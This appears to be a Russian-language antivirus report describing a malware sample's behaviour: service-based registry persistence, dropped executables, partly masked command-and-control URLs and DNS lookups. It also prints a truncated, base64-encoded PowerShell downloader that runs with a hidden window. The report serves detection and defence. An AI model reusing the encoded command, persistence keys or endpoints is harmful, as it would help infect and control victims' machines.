Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\drmmgrtn] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\drmmgrtn] 'ImagePath' = '"<SYSTEM32>\msdtckrm\drmmgrtn.exe"'
- 'drmmgrtn' "<SYSTEM32>\msdtckrm\drmmgrtn.exe"
- 'drmmgrtn' <SYSTEM32>\msdtckrm\drmmgrtn.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQADMAZAA4ADQAbgBpAD0AKAAnAFUAJwArACgAJwBmACcAKwAnADAAbQB3ACcAKwAnAHIAbAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgBWADoAdABFAG0AcABcAFcATwByAEQAXAAyADAAMQA5AFwAIAAtAG...
- %TEMP%\word\2019\sks2c17.exe
- <SYSTEM32>\msdtckrm\drmmgrtn.exe
- %TEMP%\word\2019\sks2c17.exe в <SYSTEM32>\msdtckrm\drmmgrtn.exe
- '17#.#1.208.86':80
- http://ab#####dbelow.com.au/cgi-bin/Lbi20Tu/
- http://17#.#1.208.86/YIgZOsGLO0w5rR8YXkR/ror1/DU3ZwAO/2qBg/
- DNS ASK ab#####dbelow.com.au
- '%TEMP%\word\2019\sks2c17.exe'
- '<SYSTEM32>\msdtckrm\drmmgrtn.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQADMAZAA4ADQAbgBpAD0AKAAnAFUAJwArACgAJwBmACcAKwAnADAAbQB3ACcAKwAnAHIAbAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgBWADoAdABFAG0AcABcAFcATwByAEQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)